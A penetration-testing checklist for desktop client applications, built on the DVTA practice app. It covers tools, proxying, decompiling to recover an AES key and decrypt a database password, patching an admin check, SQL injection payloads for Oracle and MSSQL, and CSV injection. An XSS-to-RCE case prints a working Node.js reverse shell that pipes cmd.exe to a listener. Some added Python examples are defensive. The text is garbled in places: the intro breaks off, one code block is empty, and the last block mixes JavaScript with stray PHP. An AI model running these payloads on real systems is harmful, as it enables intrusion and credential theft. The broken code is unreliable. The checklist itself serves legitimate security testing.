Comprehensive Penetration Testing Checklist for PC Clients: Tools, Techniques, and Case Studies

Network security

0x00 Introduction

In recent years, the interaction between users and PC clients has become increasingly important. This trend is driven by the need for enhanced user

This project primarily targets penetration testing for PC clients (CS architecture). It combines personal testing experience with online resources to form a checklist. If you have any questions, please get in touch. We look forward to more contributions in techniques and case studies from everyone.

0x01 Overview

A PC client here means a desktop application with a rich graphical user interface, built on a client/server (CS) architecture.

0x02 Development Languages

C# (.NET), JAVA, DELPHI, C, C++ ……

0x03 Protocols

TCP, HTTP(S), TDS ……

0x04 Databases

Oracle, MSSQL, DB2 ……

0x05 Testing Tools

// Related tool downloads: https://github.com/theLSA/hack-cs-tools

dvta: a deliberately vulnerable PC client for practice

ida pro: static analysis tool

ollydbg: dynamic analysis tool

CFF Explorer: PE file analysis

PEiD: packer detection tool

Exeinfo PE / StudPE: PE file analysis

wireshark: observe traffic

tcpview: observe TCP traffic

Echo Mirage: intercept TCP traffic

burpsuite: HTTP(S) packet capture

proxifier: global proxy traffic

procmon: files and registry monitoring

regshot: registry change comparison

Process Hacker: process analysis

RegfromApp: registry monitoring

WSExplorer: per-process packet capture

strings: view program strings

.NET [de]compilation:

dotpeek

de4dot

dnspy

ilspy

sae

ildasm

ilasm

Java decompilation

jad

jd-gui

jadx

dex2jar

Online versions: javare.cn, www.javadecompilers.com

Reflexil: assembly editor (can be used as an ilspy plugin)

Vcg: automated code audit tool

BinScope: binary analysis tool

0x06 Proxy Settings

Most clients have no proxy configuration of their own, so a global proxy has to be set up manually. Two ways of doing this:

1) Internet Explorer – Internet Options – Connections – LAN Settings (the system-wide WinINET proxy).

2) Proxifier (global proxy): Proxy Servers / Proxification Rules.

// HTTP traffic can be conveniently tested with BurpSuite (set proxy server to Burp proxy address).

0x07 Testing Points

0. Information Gathering

Compilation information, development environment/language, protocols used, database, IP, obfuscation/encryption, packing, etc.

Case 0 – Use CFF Explorer to view client information (e.g., the compilation environment)

dvta

1. Reverse Engineering

Decompilation, source code leakage, hardcoded keys/passwords, encryption/decryption logic, role determination logic (0-admin, 1-normal user), backdoors, etc.

Case 0 – Decompile to obtain encryption and decryption logic and develop decryption tool

dvta

From this logic and the values recovered from the decompiled client:

Encrypted text: CTsvjZ0jQghXYWbSRcPxpQ==

AES key: J8gLXc454o5tW2HEF7HahcXPufj9v8k8

IV: fq20T0gMnXa6g0l4

Build a decryption tool:

```csharp
using System;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;

namespace aesdecrypt
{
    public partial class aesdecrypt : Form
    {
        public aesdecrypt()
        {
            InitializeComponent();
        }

        // Button click handler: decrypts the stored DVTA database password
        // with the key and IV recovered from the decompiled client.
        private void decrypt(object sender, EventArgs e)
        {
            String key = "J8gLXc454o5tW2HEF7HahcXPufj9v8k8"; // 32 bytes -> AES-256
            String IV = "fq20T0gMnXa6g0l4";                  // 16 bytes -> one AES block
            String encryptedtext = "CTsvjZ0jQghXYWbSRcPxpQ==";
            byte[] encryptedBytes = Convert.FromBase64String(encryptedtext);

            AesCryptoServiceProvider aes = new AesCryptoServiceProvider();
            aes.BlockSize = 128;
            aes.KeySize = 256;
            aes.Key = Encoding.ASCII.GetBytes(key);
            aes.IV = Encoding.ASCII.GetBytes(IV);
            aes.Padding = PaddingMode.PKCS7;
            aes.Mode = CipherMode.CBC;

            // Decrypt the whole ciphertext in one call (single block here)
            ICryptoTransform crypto = aes.CreateDecryptor(aes.Key, aes.IV);
            byte[] decryptedbytes = crypto.TransformFinalBlock(encryptedBytes, 0, encryptedBytes.Length);
            String decryptedString = Encoding.ASCII.GetString(decryptedbytes);

            Console.WriteLine("\n");
            Console.WriteLine("##########Decrypting Database password##########\n");
            Console.WriteLine("Decrypted Database password:" + decryptedString + "\n");
            Console.WriteLine("##########Done##########\n");
        }
    }
}
```

Case 1 – Decompile to modify code logic, allowing normal users to log in as administrators

dvta

isadmin = 1: administrator

isadmin = 0: normal user

Changing the 1 to 0 in this check makes the client treat a normal user as admin.

2. Information Disclosure

Plaintext sensitive information, sensitive files (e.g., xxx.config in the installation directory).

Registry: use regshot to compare registry snapshots taken before and after a client action (e.g., logging in).

Development/debug logging (e.g., run dvta.exe >> log.txt to capture its console output).

Process Hacker: view plaintext sensitive data in client memory (e.g., account passwords/keys).

strings: view the client's strings directly (e.g., IP information).

View the source code (e.g., on GitHub, Gitee, etc.).
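The checks above (strings, config files, memory) all come down to spotting secret-shaped data. As an added illustration, not code from the original checklist, here is a small Python scanner in the spirit of `strings` that pulls printable runs out of a byte blob and flags the patterns that matter on a thick client: base64 blobs that are a whole number of AES blocks, 32-character tokens that could be an AES-256 key, credentials embedded in URLs, and password-like key/value pairs. `SAMPLE_BLOB` is constructed for this example (it reuses the DVTA ciphertext and key quoted above; the IP address and FTP credentials are made up), and the regexes are this example's own heuristics, not a standard.

```python
import base64
import re
from typing import Dict, List

# Constructed sample blob standing in for a client binary / app.config after
# extraction. The DVTA ciphertext and key are the ones quoted on this page;
# every other value (IP, FTP credentials) is made up for the example.
SAMPLE_BLOB = (
    b"\x00\x01MZ\x90\x00\x03junk\xff\xfe"
    b'<add key="DBSERVER" value="192.168.56.101"/>\x00\x00'
    b'<add key="DBPASSWORD" value="CTsvjZ0jQghXYWbSRcPxpQ=="/>\x00'
    b"\x7f\x13AESKEY=J8gLXc454o5tW2HEF7HahcXPufj9v8k8\x00"
    b"\x02ftp://dvta_user:FTPpass123@10.0.0.5/uploads\x00"
    b"\x90\x90plain text label\x00"
)

# Heuristics chosen for this example (assumptions, not a standard).
SECRET_NAME_RE = re.compile(r"passw(or)?d|pwd|secret|token|apikey|aeskey", re.I)
TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")        # base64-looking runs
URL_CRED_RE = re.compile(r"\b[a-z]+://[^/\s:]+:[^@\s]+@")  # scheme://user:pass@host


def extract_strings(blob: bytes, min_len: int = 6) -> List[str]:
    """Same idea as `strings -n 6`: runs of printable ASCII of at least min_len."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def classify(s: str) -> List[str]:
    """Return the reasons a string looks like leaked secret material."""
    findings = []
    if URL_CRED_RE.search(s):
        findings.append("credentials embedded in URL")
    if SECRET_NAME_RE.search(s) and ("=" in s or ":" in s):
        findings.append("secret-like key/value")
    for token in TOKEN_RE.findall(s):
        try:
            decoded_len = len(base64.b64decode(token, validate=True))
        except ValueError:  # binascii.Error is a ValueError: not real base64
            continue
        if decoded_len % 16 == 0:
            findings.append(f"base64 blob of {decoded_len} bytes (AES block multiple)")
        if len(token) == 32 and token.isalnum():
            findings.append("32-char token (possible AES-256 key)")
    return findings


def scan(blob: bytes) -> List[Dict[str, object]]:
    """Extract strings, classify each, keep only those with findings."""
    hits = []
    for s in extract_strings(blob):
        findings = classify(s)
        if findings:
            hits.append({"string": s, "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_BLOB):
        print(hit["string"])
        for reason in hit["findings"]:
            print("   ->", reason)
```

Run against a real extraction the same heuristics produce false positives (any 32-character alphanumeric identifier trips the key rule), so the output is a shortlist to confirm manually in the decompiler, not a verdict.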

Case 0 – Configuration sensitive information disclosure

dvta

Case 1 – Memory leakage of database account password

dvta

Case 2 – Source code containing hardcoded FTP account password

dvta

Case 3 – Development debugging log disclosure

dvta

Case 4 – Some systems save account passwords locally after login

//Example source from https://blog.csdn.net/weixin_30685047/article/details/95916065

3. Transmission Traffic

Wireshark / Echo Mirage / Burp Suite + NoPE Proxy / Fiddler / Charles

FTP and other protocols transmit account passwords in plaintext.

SQL statements transmitted in plaintext (they can then be tampered with, e.g., for injection or privilege escalation).

Case 0 – SQL statements of a certain educational administration system are transmitted in plaintext, returning plaintext data

//Example source from wooyun

4. Other Vulnerabilities

Brute Force

Such as login functionality.

Username Enumeration

Case 0

SQL Statement Exposure

Case 0

SQL Injection

Such as login forms; universal-password payloads:

xxx' or 'x'='x

xxx' or 1=1--

In input fields, try closing characters that break the statement and trigger an error, such as ', '), %'), order by 100--, etc.

Extract data through the echoed columns (union-based) or through error messages; the principle is the same as web SQL injection and is similar across databases.

Case 0 – oracle injection

```sql
'union select null,null,(select user from dual),null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual--
```

Case 1 – MSSQL injection

```sql
111') and (select user)>0--
```
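To make the login-bypass payloads above concrete, here is an added Python example (not from the original checklist) that uses an in-memory SQLite table as a stand-in for the client's backend database. It puts the string-concatenated query a thick client typically assembles locally next to its parameterized counterpart, and includes the error-probe step from the list above. The users table, its credentials, and the function names are constructed for this example.

```python
import sqlite3
from typing import Optional, Tuple


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the backend: two users, one of them admin."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, isadmin INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "S3cret!", 1), ("bob", "bobpass", 0)],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple]:
    """Builds the WHERE clause by string concatenation: the pattern a thick
    client exposes when it assembles SQL locally and ships it to the server."""
    sql = (
        "SELECT username, isadmin FROM users "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )
    return conn.execute(sql).fetchone()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple]:
    """Same check with bound parameters: the input stays data, never SQL."""
    return conn.execute(
        "SELECT username, isadmin FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


def probe_error(conn: sqlite3.Connection, payload: str) -> Optional[str]:
    """The closing-quote / order-by probe: a payload that breaks the statement
    makes the database error surface, which is the first sign of injection.
    Returns the error text, or None if the statement ran cleanly."""
    try:
        login_vulnerable(conn, "admin", payload)
        return None
    except sqlite3.Error as exc:
        return str(exc)


if __name__ == "__main__":
    db = build_db()
    for payload in ("xxx' or 'x'='x", "xxx' or 1=1--"):
        print(repr(payload), "->",
              "vulnerable:", login_vulnerable(db, "admin", payload),
              "| parameterized:", login_parameterized(db, "admin", payload))
    print("error probe:", probe_error(db, "xxx' order by 100--"))
```

Both universal-password payloads log the vulnerable version in as the first matching row (the admin), while the parameterized query returns nothing; `order by 100--` fails with an out-of-range error because the statement only selects two columns, which is exactly how the column count is found in the union payloads shown above.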

CSV Injection

For example, when the client exports to Excel, enter a formula such as 1+1 in a field and check whether the exported cell shows 2.
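As an added Python example, not part of the original page, here is the export-side fix and the check you would run on an exported file: cells beginning with a formula trigger (=, +, -, @, tab, carriage return) are prefixed with a single quote so the spreadsheet treats them as text. `ROWS` is constructed sample data and the function names are this example's own.

```python
import csv
import io
from typing import List, Sequence, Tuple

# Leading characters that make a spreadsheet evaluate a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample rows: the second column is user-controlled input.
ROWS = [("alice", "=1+1"), ("bob", "normal"), ("carol", "-5")]


def sanitize_cell(value: str) -> str:
    """Neutralise a formula-like cell before export by prefixing a single
    quote; the spreadsheet then shows the text literally."""
    if value and value[0] in FORMULA_TRIGGERS:
        return "'" + value
    return value


def export_rows(rows: Sequence[Sequence[object]], sanitize: bool = True) -> str:
    """Write rows as CSV, optionally applying sanitize_cell to every cell."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    for row in rows:
        cells = [str(c) for c in row]
        if sanitize:
            cells = [sanitize_cell(c) for c in cells]
        writer.writerow(cells)
    return buf.getvalue()


def find_formula_cells(csv_text: str) -> List[Tuple[int, int, str]]:
    """The post-export check: list (row, column, value) of cells that a
    spreadsheet would evaluate instead of displaying."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell and cell[0] in FORMULA_TRIGGERS:
                hits.append((r, c, cell))
    return hits


if __name__ == "__main__":
    raw = export_rows(ROWS, sanitize=False)
    print("unsanitized export flags:", find_formula_cells(raw))
    print("sanitized export flags:", find_formula_cells(export_rows(ROWS)))
```

Note the trade-off the sanitizer makes: a legitimate negative number such as -5 is also escaped, because an export routine cannot tell it from a formula by its first character alone; numeric columns should be typed as numbers upstream rather than passed through as free text.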

Weak Password

Try common combinations such as admin / 123456.

XSS

For example, clients built on Electron, NW.js (Node-Webkit), etc.

Case 0 – Chinese Ant Sword XSS to RCE

Environment: Win7 + PHPStudy (PHP5.6.27-nts) + Perl + NC + AntSword2.0.5

XSS Webshell:

```javascript
```

WIN + Node.js:

Success

```javascript
var net = require("net"), sh = require("child_process").exec("cmd.exe");
var client = new net.Socket();
client.connect(6677, "127.0.0.1", function(){
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
});
?><?php
header("HTTP/1.1 500 Not Relevant reference
```
